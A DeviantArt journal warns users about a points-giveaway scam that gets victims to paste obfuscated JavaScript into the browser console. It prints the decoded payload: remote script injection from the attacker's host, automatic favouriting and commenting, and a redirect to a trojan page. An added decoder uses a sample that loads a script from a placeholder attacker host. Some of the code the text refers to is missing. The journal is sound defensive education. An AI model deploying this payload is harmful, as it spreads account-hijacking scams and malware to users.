Recently there have been several picture spam accounts that tell the user to copy and paste some code into Firefox's or Chrome's web console, claiming users will win 20,000 dA points. Nothing could be further from the truth. Remember kids, there is no such thing as a free lunch. So, DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE.
I would like to give you all an explanation of why and how these scams work. I know not everyone is familiar with computer stuff, so I will skip some details:
Script code received from the internet is not run just because it is displayed; it only runs when your web browser interprets it. Seeing the code is one thing, executing it is another. That is why this journal entry is completely harmless: it only shows content and executes nothing, just as the malicious deviation page itself can't, so don't worry. You execute the code yourself by pasting it into the console, which is why I wrote "DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE" above, and why the attacker instructs users to do exactly that. This is how these commands "come to life" and do harm.
If you are interested in more technical details you can google "cross-site scripting".
The attacker uses a social-engineering technique, something that may sound attractive to the target audience, to make potential victims do whatever the attacker wants them to do. In this case, he is offering 20,000 dA points.
The code, placed in the deviation's description, is obfuscated to disguise its real, malicious intent. It may look something like this:
Remember that all the code shown here is harmless in this state. It is only when you paste it into the console that it wreaks havoc.
Let's see what this does:
This is in fact HEX code: each value corresponds to an ASCII character. Decoded into readable ASCII text, the code looks like this (spaces added so the address does not turn into a link):
var _0xaed7=["src","script","createElement","appendChild","body","h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r / m i x . j s"];
It does the following:
1. The first line creates an array containing some strings, which are in fact a link and some instructions...
2. The second line then reads those strings back in a different order (remembering that arrays begin at the "0th" element): 4th, 3rd, 2nd, 1st, 0th and 5th. Put together, they form this string: document body appendChild ( createElement ( script ) src = h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r / m i x . j s
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
setTimeout("document.getElementsByClassName('ll f').click()", 100);
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit").click();
window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r ';
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
When executed, it does the following:
document.getElementById("gmi-ResourceViewFaveButton").click(); makes the browser click the favorite button automatically, so the deviation shows up in other deviants' favorites and spreads further.
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!"; is similar to the previous line: it fills in the comment box so that a comment saying "It actually works! Wohoooooooo! Thanks!" is posted on your behalf.
setTimeout("document.getElementsByClassName('ll f').click()", 100); makes the browser press the "Comment" button after a short delay, since the post button is disabled until something has been written in the comment box.
window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r '; opens the attacker's web page in a new window.
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed') shows a small message box telling the victim they are being redirected to the attacker's "generator".
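The two decoding steps described above (hex escapes, then the string-array indexing) can be done by a small script instead of by hand, so a suspicious snippet can be read without ever being pasted into the console. This is an added example, not code from the journal or from the scam; the sample input is constructed and its URL is a placeholder.

```javascript
// Added example (not the journal's code): undoes the two obfuscation layers the
// journal describes (hex escapes + string-array indexing) so a snippet can be
// read WITHOUT being pasted into the console. The sample is constructed and the
// URL is a placeholder, not the address used in the scam.
const SAMPLE =
  'var _0xaed7=["\\x73\\x72\\x63","\\x73\\x63\\x72\\x69\\x70\\x74",' +
  '"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74",' +
  '"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64","\\x62\\x6F\\x64\\x79",' +
  '"https://attacker.example/mix.js"];' +
  'document[_0xaed7[4]][_0xaed7[3]](document[_0xaed7[2]](_0xaed7[1]))[_0xaed7[0]]=_0xaed7[5];';

// Layer 1: turn "\x73\x72\x63"-style escapes back into plain text ("src").
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Find `var NAME=[ ... ];`, decode each element, and hand back the name,
// the decoded values and the code that follows the array.
function extractStringArray(source) {
  const m = /var\s+(\w+)\s*=\s*\[([^\]]*)\]/.exec(source);
  if (!m) throw new Error("no string array found");
  const values = [];
  const str = /"((?:[^"\\]|\\.)*)"/g;
  let s;
  while ((s = str.exec(m[2])) !== null) values.push(decodeHexEscapes(s[1]));
  const rest = source.slice(m.index + m[0].length).replace(/^\s*;\s*/, "");
  return { name: m[1], values, rest };
}

// Layer 2: replace every NAME[i] with the literal it stands for, then fold
// obj["prop"] into obj.prop so the call chain reads like ordinary code.
function deobfuscate(source) {
  const { name, values, rest } = extractStringArray(source);
  const refs = new RegExp("\\b" + name + "\\[(\\d+)\\]", "g");
  return rest
    .replace(refs, (_, i) => JSON.stringify(values[Number(i)]))
    .replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1")
    .trim();
}

console.log(deobfuscate(SAMPLE));
```

The output is the readable script-injection line the journal walks through; the helper only rewrites text and never evaluates it.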
Finally, that page is nothing more than an attempt to lure you into installing a trojan, claiming it is a plugin necessary to display the generator, which gives the attacker complete control over the victim's computer.
Everybody knows about the phony dA login screens floating around, but beware of what you do for freebies; it might be just as bad for your account. Fortunately, dA has been fast at taking down these accounts. Unfortunately, they keep appearing. So, what better way to avoid attacks than knowing they exist?